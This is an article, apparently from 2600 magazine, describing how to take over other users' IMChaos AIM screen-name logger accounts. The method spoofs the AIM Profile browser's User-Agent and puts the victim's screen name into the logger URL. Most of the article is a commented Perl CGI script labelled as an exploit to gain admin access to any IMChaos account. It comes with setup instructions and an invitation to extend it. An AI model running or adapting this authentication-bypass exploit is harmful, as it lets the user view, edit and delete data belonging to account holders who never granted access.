Exploiting AIM Screen Name Loggers

by Stik

As an AOL Instant Messenger user, you are probably familiar with IMChaos.com, the site known for its unique screen name loggers.

To make and use your own, you choose what type of logger you want from their site; Simple List, Profile Pic, Spy Survey... all offered options will work.  You fill out the required forms then copy-and-paste your personally generated hyperlink to your profile.  Your friends will see the link in your profile, click it, and it will add their screen name to the list of others who clicked the link.

On older IMChaos loggers, you were able to gain admin access by copying the hyperlink URL from the AIM Profile window and pasting it into your browser address bar and changing your screen name to the profile holder's screen name.  With admin access you can delete, edit, and view detailed info about the visitors.

Once this technique stopped working, I started to think about what the problem could be and what they could have changed to prevent this from functioning.  I knew it worked in the AIM Profile window, but not Internet Explorer or any other browser I tried.

I used a small Perl script to grab the environment variables out of the current browser, so I could compare the results from Internet Explorer with those from the AIM Profile.

#!/usr/bin/perl
##
##  printenv -- demo CGI program which just prints its environment
##
print "Content-type: text/plain\n\n";
foreach $var (sort(keys(%ENV))) {
    $val = $ENV{$var};
    $val =~ s|\n|\\n|g;
    $val =~ s|"|\\"|g;
    print "${var}=\"${val}\"\n";
}

I then noticed the difference in User-Agent strings and came to the conclusion that the PHP script they use on their site must have a line of code that looks something like this:

<?php
$ua = $_SERVER['HTTP_USER_AGENT'];

if ($ua == "AIM/30 (Mozilla 1.24b; Windows; I; 32-bit)") {
  // they are using AIM and everything should work
}
else {
  // they aren't using AIM so the screen name will not be added
}
?>

I decided to test my theory by writing a script to spoof the AIM Profile window using Perl, emulating the AIM Profile browser by using its UserAgent in my attempt to reach the admin page.

Just as I thought, the site only works properly for the AIM Profile browser, and now, any browser using my script.

My code is listed below.  I commented it heavily for this article so you can understand what is going on.  If you decide to try to run this code, make sure it is on a machine supporting Perl/CGI with the modules HTTP:Request and LWP:UserAgent installed (which are easily obtained for free at cpan.org if you do not have them).  Once you become comfortable with the code, feel free to add on to it and make it better.

#!/usr/bin/perl
##  IMChaos.cgi 
##  Exploit to gain admin access to any IMChaos account
##  Spoofs the AIM Browser Window
##  Written by: Stik
use HTTP::Request;
use LWP::UserAgent;
  ##  Includes the above modules to be used in the script
print "Content-type: text/html\n\n";
  ##  To output as an HTML Page, this is necessary
$agent = 'AIM/30 (Mozilla 1.24b; Windows; I; 32-bit)';
  ##  UserAgent String of the AIM Window
$tmp = $ENV{'QUERY_STRING'};
  ##  URL of the hyperlink clicked, blank if no hyperlink was clicked
if($tmp ne ""){
 ##  The following keeps the browser spoofed when hyperlinks are clicked
  $tmp =~ s/link=//g;
    ##  Removes the word "link=" from the URL of the clicked hyperlink
  $listurl1 = $tmp; 
    ##  URL of the clicked hyperlink
  $ua = new LWP::UserAgent agent=>$agent, env_proxy=>1;
    ##  Spoof the AIM Profile UserAgent as the UA of the current browser
  $request = HTTP::Request->new(GET => "$listurl1"); 
  $content = $ua->request($request)->content;
    ##  Request the HTML of $listurl1, the clicked hyperlinked page
  print "$content<br>";
    ##  Display the page as it would be seen in the AIM window
} else {
 ##  The Normal Spoofed page, before any hyperlinks are clicked
  $listurl = 'http://dilutedweb.com/m.php?a=AdminScreenName&b=SETOFLETTERS';
    ##  $listurl MUST be the hyperlink url with the profile holder's SN in place of yours
  $ua = new LWP::UserAgent agent=>$agent, env_proxy=>1;
    ##  Spoof the AIM Profile UserAgent as the UA of the current browser
  $request = HTTP::Request->new(GET => "$listurl");
  $content = $ua->request($request)->content;
    ##  Request the HTML of $listurl, the Admin IMChaos Page
  $content =~ s/\href=\"/href="IMChaos.cgi?link=/g;
    ##  Replace all links with code to keep the browser spoofed as AIM
  print "$content<br>";
    ##  Display the page as it would be seen in the AIM window
}

Code: imchaos.cgi

Return to $2600 Index